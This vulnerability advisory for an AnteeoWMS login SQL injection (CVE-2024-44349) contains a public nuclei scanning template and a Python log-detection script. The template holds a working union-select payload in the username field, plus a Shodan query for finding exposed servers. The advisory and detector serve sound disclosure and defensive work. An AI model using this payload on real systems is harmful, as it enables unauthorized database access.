CVE-2024-44349: AnteeoWMS < v4.7.34 - SQL Injection

Date: 2025-08-01 | Affected software: AnteeoWMS | PoC: public

Vulnerability description

A SQL injection vulnerability in the login portal of AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and to disclose some data in the underlying database.

PoC code [public]

id: CVE-2024-44349

info:
  name: AnteeoWMS < v4.7.34 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.
  reference:
    - https://blog.cybergon.com/posts/cve-2024-44349/
    - http://nvd.nist.gov/vuln/detail/CVE-2024-44349
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-44349
    cwe-id: CWE-89
    epss-score: 0.77309
    epss-percentile: 0.98939
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"ANTEEO"
  tags: cve,cve2024,sqli,anteeowms

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /default.aspx HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: viewstate
        internal: true
        group: 1
        regex:
          - 'id="__VIEWSTATE" value="([/a-zA-Z0-9+=]+?)"'

      - type: regex
        part: body
        name: viewstategen
        internal: true
        group: 1
        regex:
          - 'id="__VIEWSTATEGENERATOR" value="([A-Z0-9]+)"'

      - type: regex
        part: body
        name: eventval
        internal: true
        group: 1
        regex:
          - 'id="__EVENTVALIDATION" value="([/a-zA-Z0-9+=]+)"'

  - raw:
      - |
        POST /default.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewstategen}}&ctl00%24MainContentPlaceHolder%24isCookieErased=&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthLogin=aa'union%20select+cast(@@version%20as%20int),null,null--%20-&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthStr=&DXScript=1_10%2C1_11%2C1_22%2C1_62%2C1_12%2C1_13%2C1_179%2C1_180%2C1_20%2C1_21%2C1_186%2C1_14%2C1_16%2C1_182%2C1_189%2C1_40%2C1_178%2C1_47%2C1_8%2C1_37&DXCss=1_206%2C1_203%2C1_66%2C1_67%2C1_68%2C1_205%2C1_202%2C1_72%2C1_71%2C0_5551%2C0_5556%2C.%2FStyles%2Fwebstyle_02.css%2C0_5390%2C0_5394%2C0_768&__CALLBACKID=ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel&__CALLBACKPARAM=c0%3A%5Bobject%20Object%5D&__EVENTVALIDATION={{urlencode(eventval)}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Conversion failed when converting the nvarchar value &#39;Microsoft SQL Server'
# digest: 4a0a004730450221009552b32c8f2a2474a330a19c9f722beae680b27ca54a90b79edd69cef39422a4022052d297d33ad0fb9d1dcbcde8f4992b2349b186ed420a8067f1adf5f6a8f706ea:922c64590222798bb761d5b6d8e72950
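As an added defensive example (not part of the advisory or of the nuclei template above), the Python below turns the two signals the template relies on into log-side detection: a DevExpress callback POST to /default.aspx whose UsrAuthLogin field carries SQL injection metacharacters, and a response body that leaks the MSSQL conversion error the template's matcher keys on. The JSON access-log format, the IP addresses and the helper names (`classify`, `scan`, `_form_body`) are assumptions for this example; the parameter name, the probe string and the error text are taken verbatim from the template.

```python
"""Flag CVE-2024-44349-style probes against the AnteeoWMS login form.

Added example, not project code. Log lines are constructed for the demo:
one JSON object per line with method, path, body, status and response_body.
"""
import json
import re
from urllib.parse import parse_qs, quote_plus

# Field name exactly as the login form posts it (template encodes '$' as %24)
LOGIN_PARAM = "ctl00$MainContentPlaceHolder$ASPxCallbackPanel$UsrAuthLogin"
# Error text the nuclei matcher looks for; an app that reaches this has
# already passed attacker input into a query and echoed the DB error back
ERROR_SIGNATURE = "Conversion failed when converting the nvarchar value"

# Conservative: a quote immediately followed by a SQL keyword, a trailing
# comment terminator, or a block comment. Plain apostrophes in names
# (o'brien) do not trigger it.
SQLI_PATTERN = re.compile(
    r"'\s*(union|select|or|and)\b|--\s*-?\s*$|/\*", re.IGNORECASE
)


def login_name_from_body(body: str) -> str:
    """Decode the form body and return the submitted login name ('' if absent)."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get(LOGIN_PARAM, [""])[0]


def classify(event: dict) -> list:
    """Return the list of detection labels that apply to one log event."""
    findings = []
    if event.get("method") == "POST" and event.get("path") == "/default.aspx":
        if SQLI_PATTERN.search(login_name_from_body(event.get("body", ""))):
            findings.append("sqli_probe_in_login_param")
    if ERROR_SIGNATURE in event.get("response_body", ""):
        findings.append("mssql_conversion_error_leaked")
    return findings


def scan(lines) -> list:
    """Scan JSON log lines; return (line_no, src_ip, labels) for each hit."""
    alerts = []
    for line_no, line in enumerate(lines, 1):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than abort the scan
        labels = classify(event)
        if labels:
            alerts.append((line_no, event.get("src_ip"), labels))
    return alerts


def _form_body(encoded_login: str) -> str:
    """Constructed body with only the fields that matter, in the template's encoding."""
    return (
        "__EVENTTARGET=&__EVENTARGUMENT=&"
        "ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthLogin="
        + encoded_login
        + "&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthStr="
    )


# The probe value exactly as the template sends it
PROBE_LOGIN = "aa'union%20select+cast(@@version%20as%20int),null,null--%20-"

# Constructed sample log: benign login, the probe, and a benign apostrophe name
SAMPLE_LOG = [
    json.dumps({"src_ip": "10.0.0.5", "method": "POST", "path": "/default.aspx",
                "body": _form_body(quote_plus("jsmith")), "status": 200,
                "response_body": "<html>Welcome</html>"}),
    json.dumps({"src_ip": "203.0.113.7", "method": "POST", "path": "/default.aspx",
                "body": _form_body(PROBE_LOGIN), "status": 500,
                "response_body": "Conversion failed when converting the nvarchar "
                                 "value &#39;Microsoft SQL Server 2019&#39; "
                                 "to data type int."}),
    json.dumps({"src_ip": "10.0.0.9", "method": "POST", "path": "/default.aspx",
                "body": _form_body(quote_plus("o'brien")), "status": 200,
                "response_body": "<html>Welcome</html>"}),
]

if __name__ == "__main__":
    for line_no, src_ip, labels in scan(SAMPLE_LOG):
        print(f"line {line_no} from {src_ip}: {', '.join(labels)}")
```

Both signals are independent on purpose: the request-side rule catches probes even when the application is patched and returns nothing interesting, while the response-side rule catches any leaked MSSQL conversion error regardless of which parameter carried the input, which is the condition the fix (parameterized queries plus generic error pages) should make impossible.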